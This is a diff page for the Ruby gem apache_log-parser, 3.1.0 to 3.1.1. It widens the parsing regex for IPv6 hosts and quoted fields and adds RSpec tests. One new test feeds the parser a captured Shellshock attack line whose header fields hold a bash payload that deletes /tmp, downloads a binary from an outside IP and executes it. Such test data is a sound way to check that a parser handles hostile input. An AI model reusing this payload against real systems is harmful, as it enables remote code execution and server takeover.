RubyGems - apache_log-parser - Versions diffs - 3.1.0 → 3.1.1 - Mend

apache_log-parser 3.1.0 → 3.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

checksums.yaml +4 -4
data/lib/apache_log/parser/version.rb +1 -1
data/lib/apache_log/parser.rb +2 -2
data/spec/apache_log/parser_spec.rb +19 -0
metadata +2 -2

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 2679264013d2c6cf84bb77978e6380edd1c4ab67
-  data.tar.gz: 71b9d2114b248aaae424daadcfdd5e86e1cc9528
+  metadata.gz: 059d6f42a9d78d8cfdb3b4245dc5bb7038b52e6b
+  data.tar.gz: 9843f3196f886414b7c7ee784669b0b26b367c6e
 SHA512:
-  metadata.gz: 3281247ab7a73b393dea4364c6595ee9adaa3803767555e3b95ccb575d6159ed5a0b0589e8f5ac6f1b98718ed666ab66be53a67718cf75799bf28f856aa25a06
-  data.tar.gz: e50f2cf1469c4a665581e4d2fbcba1490800033bb65f9e250b705a8dba821708dba266392177b776b738664571f36a2bb719b88213d42cffb75afbd002523b9d
+  metadata.gz: 0e54be8c7eee30b4d7abdc5fea023f9c88cd8917d2ff472ea74d6214bf8919f8c68a3915d8eb561de3e1d09da4300f1dd63fdd90e7a6883024f02308e42223d0
+  data.tar.gz: 577b92735e5c908b20953bfc2729777489b5f58e72517054d39674498926bf630f37559d1c595f126b4b3eba9ce467515de0f3a17c2dfe9ff3399de039873786

data/lib/apache_log/parser/version.rb CHANGED Viewed

@@ -1,5 +1,5 @@
 module ApacheLog
   class Parser
-    VERSION = "3.1.0"
+    VERSION = "3.1.1"
   end
 end

data/lib/apache_log/parser.rb CHANGED Viewed

@@ -7,8 +7,8 @@ module ApacheLog
       common_fields   = %w(remote_host identity_check user datetime request status size)
       combined_fields = common_fields + %w(referer user_agent)
-      common_pattern     = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(\S+\s\S+\s\S+)"\s+(\S+)\s+(\S+)'
-      combined_pattern   = common_pattern + '\s+"([^"]*)"\s+"([^"]*)"'
+      common_pattern     = '(?:^|\s)((?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:[\w:]+?))\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(.*?)"\s+(\S+)\s+(\S+)'
+      combined_pattern   = common_pattern + '\s+"(.*?[^\\\\])"\s+"(.*?[^\\\\])"'
       additional_pattern = ''
       additional_fields.each do

data/spec/apache_log/parser_spec.rb CHANGED Viewed

@@ -16,6 +16,15 @@ describe ApacheLog::Parser do
     expect(entity).to eq(expect)
   end
+  it 'can parse ipv6 common format log' do
+    line = '::1 - - [20/May/2014:20:04:04 +0900] "GET /test/indx.html HTTP/1.1" 200 4576'
+    parser = ApacheLog::Parser.new('common')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '::1', identity_check: '-', user: '-', datetime: DateTime.new(2014, 5, 20, 20, 04, 04, 0.375),
+      request: {method: 'GET', path: '/test/indx.html', protocol: 'HTTP/1.1'}, status: '200', size: '4576'}
+    expect(entity).to eq(expect)
+  end
   it 'can parse tab separated common format log' do
     line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/net/0000/ HTTP/1.1\"\t200\t9891";
     parser = ApacheLog::Parser.new('common')
@@ -45,6 +54,16 @@ describe ApacheLog::Parser do
     expect(entity).to eq(expect)
   end
+  it 'can parse attack log' do
+    line = '121.207.230.74 - - [13/Apr/2015:08:21:54 +0900] "GET / HTTP/1.1" 200 2392 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""'
+    parser = ApacheLog::Parser.new('combined')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '121.207.230.74', identity_check: '-', user: '-',  datetime: DateTime.new(2015, 4, 13, 8,21,54, 0.375),
+      request: {method: 'GET', path: '/', protocol: 'HTTP/1.1' }, status: '200', size: '2392', referer: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"',
+      user_agent: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"'}
+    expect(entity).to eq(expect)
+  end
   it 'can parse tab separated combined format log' do
     line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/movie/0001/-0002 HTTP/1.1\"\t200\t14462\t\"-\"\t\"DoCoMo/2.0 F08A3(c500;TB;W30H20)\"";
     parser = ApacheLog::Parser.new('combined')

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: apache_log-parser
 version: !ruby/object:Gem::Version
-  version: 3.1.0
+  version: 3.1.1
 platform: ruby
 authors:
 - Yuichi Takada
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2015-02-21 00:00:00.000000000 Z
+date: 2015-04-18 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler